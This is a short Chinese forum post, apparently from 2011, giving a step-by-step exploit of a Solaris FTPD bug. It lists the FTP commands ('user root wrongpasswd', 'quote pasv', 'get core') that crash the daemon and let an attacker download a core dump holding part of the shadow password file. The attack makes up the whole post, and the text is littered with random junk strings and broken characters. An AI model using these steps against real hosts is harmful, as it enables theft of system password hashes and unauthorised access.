該方法利用了Solaris 操作系統(tǒng)中FTPD的一個BUG,使得用戶可以獲得該機的口令文件�。具體過程如下:
9 {9 U4 J$ `5 `3 H$ J) N$ o/ o' A Y5 i: \8 j
1.通過 ftp 正常登錄到目的主機上
/ @: k+ Y4 u) u) Y1 F. E- U4 G- I+ N
2.輸入如下命令序列:
' U/ U% z( j- Y. Q$ P. D* X
( x8 P; w; k _* xftp> user root wrongpasswd+ X5 Q9 M2 e% s$ Z. i
& N$ I% ]$ b4 @# Z: Q. S4 F1 \ftp> quote pasv
; S6 L, S1 Z* h8 \ |$ x; p3 G* h6 j/ l" J) H
3.這時,ftpd會報錯退出����,同時會在當(dāng)前目錄下生成一個core,口令文件就包含在這個core中�����。4 c' V+ k: d9 c9 s) |8 t: O6 z
: q, x; u O4 ~7 M' l5 ?. @
4.再次進入FTP >get core
; U% r9 C. S/ c8 u n+ ^% ^5 i! w- y# G
補充:雖然在core只有一部分shadow����,但是對于系統(tǒng)來說已經(jīng)是致命的打擊了4 T S1 { @% i3 | N1 a3 v" U
& T2 F) N" I4 c3 j& m |
|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港
( 魯ICP備19052200號-1 )
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡